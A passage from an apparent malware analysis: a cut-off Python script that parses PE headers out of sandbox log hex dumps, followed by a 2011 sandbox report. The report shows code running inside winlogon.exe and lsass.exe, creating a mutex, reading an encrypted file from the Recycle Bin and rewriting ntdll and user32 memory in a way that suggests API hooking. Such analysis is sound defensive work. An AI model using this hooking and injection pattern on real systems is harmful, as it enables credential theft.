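    "00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 "
    "00 62 02 00")
MAPPED_BYTES = 65536              # size of the read-only "Section loaded" mapping of wininet.dll
PROTECT_CHANGE_ADDR = 0x3D94D508  # "Memory attributes changed" address inside winlogon.exe

FILE_HEADER_FMT, FILE_HEADER_NAMES = "<HHIIIHH", (
    "Machine", "NumberOfSections", "TimeDateStamp", "PointerToSymbolTable",
    "NumberOfSymbols", "SizeOfOptionalHeader", "Characteristics")
OPT_FMT, OPT_NAMES = "<HBB9I6H4IHH6I", (
    "Magic", "MajorLinkerVersion", "MinorLinkerVersion", "SizeOfCode", "SizeOfInitializedData",
    "SizeOfUninitializedData", "AddressOfEntryPoint", "BaseOfCode", "BaseOfData", "ImageBase",
    "SectionAlignment", "FileAlignment", "MajorOperatingSystemVersion",
    "MinorOperatingSystemVersion", "MajorImageVersion", "MinorImageVersion",
    "MajorSubsystemVersion", "MinorSubsystemVersion", "Win32VersionValue", "SizeOfImage",
    "SizeOfHeaders", "CheckSum", "Subsystem", "DllCharacteristics", "SizeOfStackReserve",
    "SizeOfStackCommit", "SizeOfHeapReserve", "SizeOfHeapCommit", "LoaderFlags",
    "NumberOfRvaAndSizes")
SECTION_FMT, SECTION_NAMES = "<8s6IHHI", (
    "Name", "VirtualSize", "VirtualAddress", "SizeOfRawData", "PointerToRawData",
    "PointerToRelocations", "PointerToLinenumbers", "NumberOfRelocations",
    "NumberOfLinenumbers", "Characteristics")


def unhex(s):
    return bytes.fromhex(s.replace(" ", ""))


def e_lfanew(raw):
    return struct.unpack("<I", raw[:4])[0]


def parse_file_header(raw):
    return dict(zip(FILE_HEADER_NAMES, struct.unpack(FILE_HEADER_FMT, raw[:20])))


def parse_optional_header(raw):
    """PE32 optional header; (RVA, Size) data directories start at offset 96."""
    hdr = dict(zip(OPT_NAMES, struct.unpack(OPT_FMT, raw[:96])))
    if hdr["Magic"] != 0x10B:
        raise ValueError("not a PE32 optional header")
    hdr["DataDirectory"] = [struct.unpack_from("<II", raw, o) for o in range(96, len(raw) - 7, 8)]
    # The 100-byte cap leaves a lone RVA whose Size was cut off; keep it (entry 0 = exports).
    hdr["TruncatedDirectoryRva"] = (struct.unpack_from("<I", raw, len(raw) - 4)[0]
                                    if (len(raw) - 96) % 8 == 4 else None)
    return hdr


def parse_section_table(raw):
    """Complete 40-byte IMAGE_SECTION_HEADER entries only; a cut-off tail is skipped."""
    secs = []
    for off in range(0, len(raw) - 39, 40):
        s = dict(zip(SECTION_NAMES, struct.unpack_from(SECTION_FMT, raw, off)))
        s["Name"] = s["Name"].rstrip(b"\0").decode("ascii", "replace")
        secs.append(s)
    return secs


def section_for_rva(sections, rva):
    for s in sections:
        end = s["VirtualAddress"] + max(s["VirtualSize"], s["SizeOfRawData"])
        if s["VirtualAddress"] <= rva < end:
            return s
    return None


def rva_to_file_offset(sections, rva):
    s = section_for_rva(sections, rva)
    return None if s is None else rva - s["VirtualAddress"] + s["PointerToRawData"]


def summarize():
    fh = parse_file_header(unhex(FILE_HEADER_HEX))
    oh = parse_optional_header(unhex(OPTIONAL_HEADER_HEX))
    secs = parse_section_table(unhex(SECTION_TABLE_HEX))
    export_off = rva_to_file_offset(secs, oh["TruncatedDirectoryRva"])
    # Assumption: no ASLR on XP, so wininet.dll sits at its preferred ImageBase in winlogon.exe.
    hook_rva = PROTECT_CHANGE_ADDR - oh["ImageBase"]
    hook_sec = section_for_rva(secs, hook_rva)
    return {
        "e_lfanew": e_lfanew(unhex(E_LFANEW_HEX)),
        "machine": fh["Machine"],
        "link_time": datetime.fromtimestamp(fh["TimeDateStamp"], timezone.utc).isoformat(),
        "image_base": oh["ImageBase"],
        "entry_point": oh["AddressOfEntryPoint"],
        "sections": [s["Name"] for s in secs],
        "export_dir_rva": oh["TruncatedDirectoryRva"],
        "export_dir_file_offset": export_off,
        "export_dir_inside_mapping": export_off is not None and export_off < MAPPED_BYTES,
        "protect_change_rva": hook_rva,
        "protect_change_section": None if hook_sec is None else hook_sec["Name"],
    }


if __name__ == "__main__":
    for key, val in summarize().items():
        print(f"{key:28} {val:#x}" if type(val) is int else f"{key:28} {val}")
```

Running the file prints the decoded summary; the same functions decode the ws2_32.dll, advapi32.dll and crypt32.dll reads if their "Value:" hex is substituted for the wininet.dll constants.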
System info queried Type: BasicInformation success or wait 2019967854
System info queried Type: ProcessorInformation success or wait 2019967911
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM success or wait 2019969345
System info queried Type: CurrentTimeZoneInformation success or wait 2019969498
Thread created PID: 636 TID: 2448 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2019970328
File opened Path: C:\WINDOWS\system32\ws2_32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2019971297
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: A40000 Size: 94208 Protection: readonly Mapped to pid: own pid image not at base 2019971618
Thread created PID: 636 TID: 2436 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2019972094
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 15E0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2019974288
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: write and read and execute Type: commit Baseaddress: 15E0000 Size: 245760 Protection: execute Mapped to pid: own pid success or wait 2019981398
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: query and write and read and execute Type: image Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 2019983145
System info queried Type: BasicInformation success or wait 2019989591
System info queried Type: ProcessorInformation success or wait 2019989729
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2019990070
Section loaded Path: \KnownDlls\hnetcfg.dll Access: write and read and execute Type: unknown Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid object name not found 2019990302
Section loaded Path: C:\WINDOWS\system32\hnetcfg.dll Access: query and write and read and execute Type: image Baseaddress: 662B0000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2019990829
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 15E0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2019994923
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: A60000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2020003638
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: query and write and read and execute Type: image Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2020033908
Section loaded Path: \KnownDlls\DNSAPI.dll Access: write and read and execute Type: unknown Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2020060345
Section loaded Path: C:\WINDOWS\system32\dnsapi.dll Access: query and write and read and execute Type: image Baseaddress: 76F20000 Size: 159744 Protection: read write Mapped to pid: own pid success or wait 2020060918
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: write and read and execute Type: commit Baseaddress: A40000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2020083202
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: query and write and read and execute Type: image Baseaddress: 76FB0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2020085509
Thread delayed Time: 0 TID: 8786 success or wait 2021390051
Thread delayed Time: 0 TID: 8786 success or wait 2021390517
Thread delayed Time: 0 TID: 8786 success or wait 2021390885
System info queried Type: BasicInformation success or wait 2021393589
Section loaded Path: \KnownDlls\rasadhlp.dll Access: write and read and execute Type: unknown Baseaddress: 76FB0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2021395060
Section loaded Path: C:\WINDOWS\system32\rasadhlp.dll Access: query and write and read and execute Type: image Baseaddress: 76FC0000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2021395598
File opened Path: C:\WINDOWS\system32\ws2_32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2021424635
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: A50000 Size: 94208 Protection: readonly Mapped to pid: own pid image not at base 2021424951
File opened Path: C:\WINDOWS\system32\ws2_32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2021428410
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: A50000 Size: 94208 Protection: readonly Mapped to pid: own pid image not at base 2021428724
File opened Path: C:\WINDOWS\system32\ws2_32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2021429777
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: A50000 Size: 94208 Protection: readonly Mapped to pid: own pid image not at base 2021430335
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 15E0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2021464144
Thread delayed Time: 0 TID: 8786 success or wait 2029172024
Thread delayed Time: 0 TID: 8786 success or wait 2029172273
Thread delayed Time: 0 TID: 8786 success or wait 2029172415
Thread delayed Time: 0 TID: 8786 success or wait 2030280956
Thread delayed Time: 0 TID: 8786 success or wait 2030281109
Thread delayed Time: 0 TID: 8786 success or wait 2030281256
Thread delayed Time: 0 TID: 8786 success or wait 2031392931
Thread delayed Time: 0 TID: 8786 success or wait 2031393352
Thread delayed Time: 0 TID: 8786 success or wait 2031393768
Thread delayed Time: 0 TID: 8786 success or wait 2033442951
Thread delayed Time: 0 TID: 8786 success or wait 2033459531
Thread delayed Time: 0 TID: 8786 success or wait 2033512601
Thread delayed Time: 0 TID: 8786 success or wait 2035755150
Thread delayed Time: 0 TID: 8786 success or wait 2035755781
Thread delayed Time: 0 TID: 8786 success or wait 2035756210
Thread delayed Time: 0 TID: 8786 success or wait 2036874447
Thread delayed Time: 0 TID: 8786 success or wait 2036875208
Thread delayed Time: 0 TID: 8786 success or wait 2036875705
Thread delayed Time: 0 TID: 8786 success or wait 2038031819
Thread delayed Time: 0 TID: 8786 success or wait 2038033468
Thread delayed Time: 0 TID: 8786 success or wait 2038034870
Thread delayed Time: 0 TID: 8786 success or wait 2041020645
Thread delayed Time: 0 TID: 8786 success or wait 2041022731
Thread delayed Time: 0 TID: 8786 success or wait 2041024426
Thread delayed Time: 0 TID: 8786 success or wait 2042279691
Thread delayed Time: 0 TID: 8786 success or wait 2042280874
Thread delayed Time: 0 TID: 8786 success or wait 2042303321
Thread delayed Time: 0 TID: 8786 success or wait 2046819755
Thread delayed Time: 0 TID: 8786 success or wait 2046820944
Thread delayed Time: 0 TID: 8786 success or wait 2046821593
Thread delayed Time: 0 TID: 8786 success or wait 2048439700
Thread delayed Time: 0 TID: 8786 success or wait 2048440900
Thread delayed Time: 0 TID: 8786 success or wait 2048442056
Thread delayed Time: 0 TID: 8786 success or wait 2049930080
Thread delayed Time: 0 TID: 8786 success or wait 2049930890
Thread delayed Time: 0 TID: 8786 success or wait 2049931538
Thread delayed Time: 0 TID: 8786 success or wait 2051535985
Thread delayed Time: 0 TID: 8786 success or wait 2051538442
Thread delayed Time: 0 TID: 8786 success or wait 2051539876
Thread delayed Time: 0 TID: 8786 success or wait 2052646623
Thread delayed Time: 0 TID: 8786 success or wait 2052648307
Thread delayed Time: 0 TID: 8786 success or wait 2052650144
Thread delayed Time: 0 TID: 8786 success or wait 2053766353
Thread delayed Time: 0 TID: 8786 success or wait 2053768184
Thread created PID: 636 TID: 2568 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2127654508
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2127664280
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 15E0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2127666083
Thread created PID: 636 TID: 1388 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2236412106
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 1620000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2236412384
Thread created PID: 636 TID: 284 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2236413176
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2236420889
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 1620000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2236421525
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 15E0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2236437545
Thread created PID: 636 TID: 3500 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2344828856
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2344832693
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 15E0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2344834523
+ Sections
+ General
Start time: 05:48:05
Start date: 01/12/2011
Path: C:\WINDOWS\system32\lsass.exe
Commandline: C:\WINDOWS\system32\lsass.exe
Imagebase: 0x1000000
File size: 13312 bytes
MD5 hash: BF2466B3E18E970D8A976FB95FC1CA85
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
C:\WINDOWS\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 4 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll none 4 D0 00 00 00 success or wait 5 BAD6699
C:\WINDOWS\system32\ntdll.dll none 20 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 5 BAD66D5
C:\WINDOWS\system32\ntdll.dll none 224 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 5 BAD6717
C:\WINDOWS\system32\ntdll.dll none 160 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 5 BAD67A2
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
C:\WINDOWS\system32\user32.dll none 4 D8 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\user32.dll none 20 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\user32.dll none 224 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\user32.dll none 160 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\wininet.dll none 4 F8 00 00 00 success or wait 11 BAD6699
C:\WINDOWS\system32\wininet.dll none 20 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 11 BAD66D5
C:\WINDOWS\system32\wininet.dll none 224 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 11 BAD6717
C:\WINDOWS\system32\wininet.dll none 160 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 11 BAD67A2
C:\WINDOWS\system32\ws2_32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\ws2_32.dll none 20 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\ws2_32.dll none 224 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\ws2_32.dll none 160 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\advapi32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\advapi32.dll none 20 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\advapi32.dll none 224 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\advapi32.dll none 160 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\crypt32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\crypt32.dll none 20 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\crypt32.dll none 224 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\crypt32.dll none 160 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 1 BAD67A2
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll PositionInformation Offset: 60 success or wait 20 BAD667A
C:\WINDOWS\system32\user32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
C:\WINDOWS\system32\wininet.dll PositionInformation Offset: 60 success or wait 44 BAD667A
C:\WINDOWS\system32\ws2_32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
C:\WINDOWS\system32\advapi32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
C:\WINDOWS\system32\crypt32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
Section Activities:
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown 9C0000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown BE0000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit BE0000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit BE0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit BE0000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit BE0000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit F60000 77824 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 9B06B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
660 692 7C8106F9 false C:\WINDOWS\system32\lsass.exe success or wait 1 9B0639
2628 692 7C8106F9 false C:\WINDOWS\system32\lsass.exe success or wait 1 BAD6140
2624 692 7C8106F9 false C:\WINDOWS\system32\lsass.exe success or wait 1 BAD6140
1932 692 7C8106F9 false C:\WINDOWS\system32\lsass.exe success or wait 1 BAD6140
484 692 7C8106F9 false C:\WINDOWS\system32\lsass.exe success or wait 1 BAD6140
1760 692 7C8106F9 false C:\WINDOWS\system32\lsass.exe success or wait 1 BAD6140
1976 692 7C8106F9 false C:\WINDOWS\system32\lsass.exe success or wait 1 BAD6140
1004 692 7C8106F9 false C:\WINDOWS\system32\lsass.exe success or wait 1 BAD6140
3964 692 7C8106F9 false C:\WINDOWS\system32\lsass.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
9768 0s success or wait 933 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
660 692 success or wait 0 9B0279
Memory Activities:
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
692 C:\WINDOWS\system32\lsass.exe 7C90CFEE 2000 page execute and read and write page execute and read and write success or wait 1 9B05EC
692 C:\WINDOWS\system32\lsass.exe 7C90D76E 2000 page execute and read and write page execute and write copy success or wait 1 BAE95DC
692 C:\WINDOWS\system32\lsass.exe 7C90D76E 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
692 C:\WINDOWS\system32\lsass.exe BAF6E20 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
692 C:\WINDOWS\system32\lsass.exe 7C90DF1E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
692 C:\WINDOWS\system32\lsass.exe BB10A90 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CA1
692 C:\WINDOWS\system32\lsass.exe 7C90DC5E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
692 C:\WINDOWS\system32\lsass.exe BAFF2F8 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CB7
692 C:\WINDOWS\system32\lsass.exe 7C90D2EE 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
692 C:\WINDOWS\system32\lsass.exe BAFCF58 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CCD
692 C:\WINDOWS\system32\lsass.exe 7C90DB3E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
692 C:\WINDOWS\system32\lsass.exe BB10168 2000 page execute and read and write page execute and read and write success or wait 1 BAF2D09
692 C:\WINDOWS\system32\lsass.exe 7E418BF6 2000 page execute and read and write page execute read success or wait 1 BAE95DC
692 C:\WINDOWS\system32\lsass.exe 7E418BF6 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
